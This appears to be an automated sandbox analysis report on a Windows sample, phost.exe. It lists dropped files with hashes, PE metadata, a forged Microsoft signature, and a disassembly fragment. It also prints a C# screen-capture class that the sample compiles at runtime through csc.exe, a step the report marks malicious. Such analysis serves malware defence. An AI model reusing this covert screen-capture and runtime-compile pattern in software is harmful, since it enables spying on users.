                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                                                                                                            File Type:MSVC .res
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):652
                                                                                                                                                                                                                            Entropy (8bit):3.095915071224832
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryLYak7YnqqGNPN5Dlq5J:+RI+ycuZhNpYakSGNPNnqX
                                                                                                                                                                                                                            MD5:39C59C69AAA5EED127843D1E5F5B7D9A
                                                                                                                                                                                                                            SHA1:52D6A767476F0994F9F8BF4E9083A9A7A3169044
                                                                                                                                                                                                                            SHA-256:6F83F96A3151C087C37A335F31A26F16C7C1E583412B29059D46071A5A669C78
                                                                                                                                                                                                                            SHA-512:193D61CF36896B599A1E0DF6D40A3592ACB1FAA2CBCA3380394E442D63C1A405892CFF8B352D16610264D958BC09D8AA0C8ED2C2C16ABA20ED35313888C6CF7D
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...j.n.x.i.p.h.g.t...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...j.n.x.i.p.h.g.t...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                            File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):1004
                                                                                                                                                                                                                            Entropy (8bit):4.154581034278981
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:24:Jo4KMz04F03wykl4qk6oAuBGOUBrRmLW+7UCPa:Jo4hz0BAl4xBQ0XQCC
                                                                                                                                                                                                                            MD5:C76055A0388B713A1EABE16130684DC3
                                                                                                                                                                                                                            SHA1:EE11E84CF41D8A43340F7102E17660072906C402
                                                                                                                                                                                                                            SHA-256:8A3CD008E86A3D835F55F8415F5FD264C6DACDF0B7286E6854EA3F5A363390E7
                                                                                                                                                                                                                            SHA-512:22D2804491D90B03BB4B640CB5E2A37D57766C6D82CAF993770DCF2CF97D0F07493C870761F3ECEA15531BD434B780E13AE065A1606681B32A77DBF6906FB4E2
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:.using System;..using System.Collections.Generic;..using System.Drawing;..using System.Windows.Forms;....public class Screenshot..{.. public static List<Bitmap> CaptureScreens().. {.. var results = new List<Bitmap>();.. var allScreens = Screen.AllScreens;.... foreach (Screen screen in allScreens).. {.. try.. {.. Rectangle bounds = screen.Bounds;.. using (Bitmap bitmap = new Bitmap(bounds.Width, bounds.Height)).. {.. using (Graphics graphics = Graphics.FromImage(bitmap)).. {.. graphics.CopyFromScreen(new Point(bounds.Left, bounds.Top), Point.Empty, bounds.Size);.. }.... results.Add((Bitmap)bitmap.Clone());.. }.. }.. catch (Exception).. {.. // Handle any exceptions here.. }.. }.... return results;..
                                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                            File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (604), with no line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):607
                                                                                                                                                                                                                            Entropy (8bit):5.363038818064354
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:12:p37Lvkmb6KOkqe1xBkrk+ikOfFyWZEifF59:V3ka6KOkqeFkOfREifX9
                                                                                                                                                                                                                            MD5:E53A72B0EFC65095CF1988DA01F172E2
                                                                                                                                                                                                                            SHA1:2DEB23484235D18D21DBC5E1398C9847594D0F54
                                                                                                                                                                                                                            SHA-256:C6426350E1FC5BFBB2186D57F4F19D338996D1670E4A750DBF996B76BD3D2306
                                                                                                                                                                                                                            SHA-512:86E1273E22427A0452FBB277B92DC500FB16EF17839FF88302132BF7F3E5965A11030FB0E34C5ED54E6FFA58D5B3ABC35158758BD2678BAE48BB085B7DB583EE
                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll" /out:"C:\Users\user\AppData\Local\Temp\jnxiphgt\jnxiphgt.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\jnxiphgt\jnxiphgt.0.cs"
                                                                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):4096
                                                                                                                                                                                                                            Entropy (8bit):3.157522076694003
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:48:6h7oEAtf0KhzBU/2f6mtJFN0npW1ulia32q:7Nz0pmdOnEK
                                                                                                                                                                                                                            MD5:D1F54FB254363100063A1E6E9805257C
                                                                                                                                                                                                                            SHA1:72DA27B8496544A77611315787267880C71A877A
                                                                                                                                                                                                                            SHA-256:D55B50C929F43AC85CBCD923FBDCBA614F40B61027584D440C393D884A2D1880
                                                                                                                                                                                                                            SHA-512:94544A68FE47C86DC5F04E40B18F49F45CEE0E5829AB12D39D4F34CF0EA1A370DE3844F9D5B3545E05318D3B1B6C3A9F5DB51CE2D2A48A7139B264477FED19B8
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....[g...........!.................&... ...@....... ....................................@..................................%..K....@.......................`....................................................... ............... ..H............text...$.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................&......H.......<!...............................................................0..........s.....(...........8...........o.......(......(....s........(..........(......(....s....~......(....o........,...o........o....t....o........,...o.......&.....X.......i?k....*...(....B.(j........9.Q...........{.........(....*BSJB............v4.0.30319......l.......#~..........#Strings............#US.........#GUID...........#Blob...........G.........%3............................................
                                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                            File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (708), with CRLF, CR line terminators
                                                                                                                                                                                                                            Category:modified
                                                                                                                                                                                                                            Size (bytes):1148
                                                                                                                                                                                                                            Entropy (8bit):5.504656764168761
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:24:KJfTId3ka6KOkqeFkOfREifX4Kax5DqBVKVrdFAMBJTH:uTkka6NkqeFkyREuX4K2DcVKdBJj
                                                                                                                                                                                                                            MD5:45F3B588A431D010F9D266622E121793
                                                                                                                                                                                                                            SHA1:5DF1C6D56C8804838395DBD594EF386C88D08C1C
                                                                                                                                                                                                                            SHA-256:1C44FDB5CBE0E88CE11C058619F8709A4AEAD1E8350094FC7F307B8FADB4237A
                                                                                                                                                                                                                            SHA-512:2ECA98EEC9B39B5E1A76A91C72466175EDAF1D55460FD4ABDDAAE14D353C911454A466BF7F8EADB28FECFB979CB2C5AD70818977B8058FCB99406D6465E7A856
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:.C:\Users\user\AppData\Local\Temp\..........> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll" /out:"C:\Users\user\AppData\Local\Temp\jnxiphgt\jnxiphgt.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\jnxiphgt\jnxiphgt.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer
                                                                                                                                                                                                                            Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):55
                                                                                                                                                                                                                            Entropy (8bit):4.306461250274409
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                                                                                                                                                            MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                                                                                                                                                            SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                                                                                                                                                            SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                                                                                                                                                            SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
                                                                                                                                                                                                                            Process:C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):97
                                                                                                                                                                                                                            Entropy (8bit):4.331807756485642
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3:lyAZFXZDLsFzAXmZrCZDL4QXAVJK4v:lyqBtoJAXmoZDL4CA1v
                                                                                                                                                                                                                            MD5:195D02DA13D597A52F848A9B28D871F6
                                                                                                                                                                                                                            SHA1:D048766A802C61655B9689E953103236EACCB1C7
                                                                                                                                                                                                                            SHA-256:ADE5C28A2B27B13EFB1145173481C1923CAF78648E49205E7F412A2BEFC7716A
                                                                                                                                                                                                                            SHA-512:1B9EDA54315B0F8DB8E43EC6E78996464A90E84DE721611647E8395DBE259C282F06FB6384B08933F8F0B452B42E23EE5A7439974ACC5F53DAD64B08D39F4146
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:..Service Version: 0.0.0.0..Engine Version: 0.0.0.0....No engine/signature is currently loaded...
                                                                                                                                                                                                                            File type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                            Entropy (8bit):7.993007862257056
                                                                                                                                                                                                                            TrID:
                                                                                                                                                                                                                            • Win64 Executable GUI (202006/5) 92.65%
                                                                                                                                                                                                                            • Win64 Executable (generic) (12005/4) 5.51%
                                                                                                                                                                                                                            • Generic Win/DOS Executable (2004/3) 0.92%
                                                                                                                                                                                                                            • DOS Executable Generic (2002/1) 0.92%
                                                                                                                                                                                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                            File name:phost.exe
                                                                                                                                                                                                                            File size:7'832'204 bytes
                                                                                                                                                                                                                            MD5:8c43bf4445cac5fa025b9dfd07517b6f
                                                                                                                                                                                                                            SHA1:b7e9e405e3867213cd3e544574ceff70bef2b6fb
                                                                                                                                                                                                                            SHA256:dcf517b48094726367f1fdb2ace3f2cfd29f4f9710512f45ecb0109d03cc0dcc
                                                                                                                                                                                                                            SHA512:95097a7d6cbd1bf6ef197a740d70f98ba5dfd8081c3bee0f9f8e3bd100df36a949d5caa770c918f01f4c1d78227ba355026a3774ca2b06329fe6bc5bba00a8a3
                                                                                                                                                                                                                            SSDEEP:196608:oPvLjv+bhqNVoBLD7fEXEoYbiIv9pvvk9fIiZ1jA:ajL+9qz8LD7fEUbiIqQgpA
                                                                                                                                                                                                                            TLSH:BF863358A3A80DF1EE76503DD766DC4ADB36B8022710C9CF17A563266E27CC5843BBB1
                                                                                                                                                                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......t=.30\.`0\.`0\.`{$.a7\.`{$.a.\.`{$.a:\.` ..`3\.` ..a9\.` ..a!\.` ..a.\.`{$.a;\.`0\.`.\.`{..a)\.`{..a1\.`Rich0\.`........PE..d..
                                                                                                                                                                                                                            Icon Hash:212303032313271a
                                                                                                                                                                                                                            Entrypoint:0x14000ce20
                                                                                                                                                                                                                            Entrypoint Section:.text
                                                                                                                                                                                                                            Digitally signed:true
                                                                                                                                                                                                                            Imagebase:0x140000000
                                                                                                                                                                                                                            Subsystem:windows gui
                                                                                                                                                                                                                            Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                                                                                                                                                            DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                            Time Stamp:0x6755D914 [Sun Dec 8 17:36:20 2024 UTC]
                                                                                                                                                                                                                            TLS Callbacks:
                                                                                                                                                                                                                            CLR (.Net) Version:
                                                                                                                                                                                                                            OS Version Major:6
                                                                                                                                                                                                                            OS Version Minor:0
                                                                                                                                                                                                                            File Version Major:6
                                                                                                                                                                                                                            File Version Minor:0
                                                                                                                                                                                                                            Subsystem Version Major:6
                                                                                                                                                                                                                            Subsystem Version Minor:0
                                                                                                                                                                                                                            Import Hash:72c4e339b7af8ab1ed2eb3821c98713a
                                                                                                                                                                                                                            Signature Valid:false
                                                                                                                                                                                                                            Signature Issuer:CN=Microsoft Windows Production PCA 2011, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
                                                                                                                                                                                                                            Signature Validation Error:The digital signature of the object did not verify
                                                                                                                                                                                                                            Error Number:-2146869232
                                                                                                                                                                                                                            Not Before, Not After
                                                                                                                                                                                                                            • 27/03/2019 19:21:25 27/03/2020 19:21:25
                                                                                                                                                                                                                            Subject Chain
                                                                                                                                                                                                                            • CN=Microsoft Windows Publisher, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
                                                                                                                                                                                                                            Version:3
                                                                                                                                                                                                                            Thumbprint MD5:AA1D28E8A5D68A49858575128FE50CF2
                                                                                                                                                                                                                            Thumbprint SHA-1:995C912805748FCA8F583E1506E1EC651CB24877
                                                                                                                                                                                                                            Thumbprint SHA-256:EE4E8D1212CAEC402EA6EE8C2CD33B6856BE8CB51D5D70D3468BAB51E529F7EA
                                                                                                                                                                                                                            Serial:33000002176A92089823FB0577000000000217
                                                                                                                                                                                                                            Instruction
                                                                                                                                                                                                                            dec eax
                                                                                                                                                                                                                            sub esp, 28h
                                                                                                                                                                                                                            call 00007FC204FFC2ACh
                                                                                                                                                                                                                            dec eax
                                                                                                                                                                                                                            add esp, 28h
                                                                                                                                                                                                                            jmp 00007FC204FFBECFh
                                                                                                                                                                                                                            int3
                                                                                                                                                                                                                            int3
                                                                                                                                                                                                                            int3
                                                                                                                                                                                                                            int3
                                                                                                                                                                                                                            int3
                                                                                                                                                                                                                            int3
                                                                                                                                                                                                                            int3
                                                                                                                                                                                                                            int3
                                                                                                                                                                                                                            int3
                                                                                                                                                                                                                            int3
                                                                                                                                                                                                                            int3
                                                                                                                                                                                                                            int3
                                                                                                                                                                                                                            int3
                                                                                                                                                                                                                            int3
                                                                                                                                                                                                                            dec eax
                                                                                                                                                                                                                            sub esp, 28h
                                                                                                                                                                                                                            call 00007FC204FFC678h
                                                                                                                                                                                                                            test eax, eax
                                                                                                                                                                                                                            je 00007FC204FFC073h
                                                                                                                                                                                                                            dec eax
                                                                                                                                                                                                                            mov eax, dword ptr [00000030h]
                                                                                                                                                                                                                            dec eax
                                                                                                                                                                                                                            mov ecx, dword ptr [eax+08h]
                                                                                                                                                                                                                            jmp 00007FC204FFC057h
                                                                                                                                                                                                                            dec eax
                                                                                                                                                                                                                            cmp ecx, eax
                                                                                                                                                                                                                            je 00007FC204FFC066h
                                                                                                                                                                                                                            xor eax, eax
                                                                                                                                                                                                                            dec eax
                                                                                                                                                                                                                            cmpxchg dword ptr [0003570Ch], ecx
                                                                                                                                                                                                                            jne 00007FC204FFC040h
                                                                                                                                                                                                                            xor al, al
                                                                                                                                                                                                                            dec eax
                                                                                                                                                                                                                            add esp, 28h
                                                                                                                                                                                                                            ret
                                                                                                                                                                                                                            mov al, 01h
                                                                                                                                                                                                                            jmp 00007FC204FFC049h
                                                                                                                                                                                                                            int3
                                                                                                                                                                                                                            int3
                                                                                                                                                                                                                            int3
                                                                                                                                                                                                                            dec eax
                                                                                                                                                                                                                            sub esp, 28h
                                                                                                                                                                                                                            test ecx, ecx
                                                                                                                                                                                                                            jne 00007FC204FFC059h
                                                                                                                                                                                                                            mov byte ptr [000356F5h], 00000001h
                                                                                                                                                                                                                            call 00007FC204FFB7A5h
                                                                                                                                                                                                                            call 00007FC204FFCA90h
                                                                                                                                                                                                                            test al, al
                                                                                                                                                                                                                            jne 00007FC204FFC056h
                                                                                                                                                                                                                            xor al, al
                                                                                                                                                                                                                            jmp 00007FC204FFC066h
                                                                                                                                                                                                                            call 00007FC2050095AFh
                                                                                                                                                                                                                            test al, al
                                                                                                                                                                                                                            jne 00007FC204FFC05Bh
                                                                                                                                                                                                                            xor ecx, ecx
                                                                                                                                                                                                                            call 00007FC204FFCAA0h
                                                                                                                                                                                                                            jmp 00007FC204FFC03Ch
                                                                                                                                                                                                                            mov al, 01h
                                                                                                                                                                                                                            dec eax
                                                                                                                                                                                                                            add esp, 28h
                                                                                                                                                                                                                            ret
                                                                                                                                                                                                                            int3
                                                                                                                                                                                                                            int3
                                                                                                                                                                                                                            inc eax
                                                                                                                                                                                                                            push ebx
                                                                                                                                                                                                                            dec eax
                                                                                                                                                                                                                            sub esp, 20h
                                                                                                                                                                                                                            cmp byte ptr [000356BCh], 00000000h
                                                                                                                                                                                                                            mov ebx, ecx
                                                                                                                                                                                                                            jne 00007FC204FFC0B9h
                                                                                                                                                                                                                            cmp ecx, 01h
                                                                                                                                                                                                                            jnbe 00007FC204FFC0BCh
                                                                                                                                                                                                                            call 00007FC204FFC5EEh
                                                                                                                                                                                                                            test eax, eax
                                                                                                                                                                                                                            je 00007FC204FFC07Ah
                                                                                                                                                                                                                            test ebx, ebx
                                                                                                                                                                                                                            jne 00007FC204FFC076h
                                                                                                                                                                                                                            dec eax
                                                                                                                                                                                                                            lea ecx, dword ptr [000356A6h]
                                                                                                                                                                                                                            call 00007FC2050093A2h
                                                                                                                                                                                                                            NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x3ca340x78.rdata
                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x470000x327c.rsrc
                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x440000x2238.pdata
                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x775c5c0x2630
                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x4b0000x764.reloc
                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x3a0800x1c.rdata
                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x39f400x140.rdata
                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_IAT0x2b0000x4a0.rdata
                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                                                                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                            .text0x10000x29f700x2a000b8c3814c5fb0b18492ad4ec2ffe0830aFalse0.5518740699404762data6.489205819736506IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                            .rdata0x2b0000x12a280x12c006118b3c9155206deefa2f382d4c72980False0.5243229166666666data5.750765168350593IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                            .data0x3e0000x53f80xe00dba0caeecab624a0ccc0d577241601d1False0.134765625data1.8392217063172436IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                            .pdata0x440000x22380x24009cd1eac931545f28ab09329f8bfce843False0.4697265625data5.2645170849678795IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                            .rsrc0x470000x327c0x3400141d1b5390a493815cc6b39414748958False0.8285006009615384data7.472807445255008IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                            .reloc0x4b0000x7640x800816c68eeb419ee2c08656c31c06a0fffFalse0.5576171875data5.2809528666624175IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                                            RT_ICON0x472500x1c1PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced1.024498886414254
                                                                                                                                                                                                                            RT_ICON0x474140x20cPNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced1.0209923664122138
                                                                                                                                                                                                                            RT_ICON0x476200x273PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced1.0175438596491229
                                                                                                                                                                                                                            RT_ICON0x478940x434PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced1.0102230483271375
                                                                                                                                                                                                                            RT_ICON0x47cc80x53ePNG image data, 64 x 64, 8-bit/color RGBA, non-interlaced1.0081967213114753
                                                                                                                                                                                                                            RT_ICON0x482080x9b9PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced1.004419445560466
                                                                                                                                                                                                                            RT_ICON0x48bc40xdc3PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.930456996877661
                                                                                                                                                                                                                            RT_GROUP_ICON0x499880x68data0.7403846153846154
                                                                                                                                                                                                                            RT_VERSION0x499f00x37cdata0.4742152466367713
                                                                                                                                                                                                                            RT_MANIFEST0x49d6c0x50dXML 1.0 document, ASCII text0.4694508894044857
                                                                                                                                                                                                                            DLLImport
                                                                                                                                                                                                                            USER32.dllCreateWindowExW, ShutdownBlockReasonCreate, MsgWaitForMultipleObjects, ShowWindow, DestroyWindow, RegisterClassW, DefWindowProcW, PeekMessageW, DispatchMessageW, TranslateMessage, PostMessageW, GetMessageW, MessageBoxW, MessageBoxA, SystemParametersInfoW, DestroyIcon, SetWindowLongPtrW, GetWindowLongPtrW, GetClientRect, InvalidateRect, ReleaseDC, GetDC, DrawTextW, GetDialogBaseUnits, EndDialog, DialogBoxIndirectParamW, MoveWindow, SendMessageW
                                                                                                                                                                                                                            COMCTL32.dll
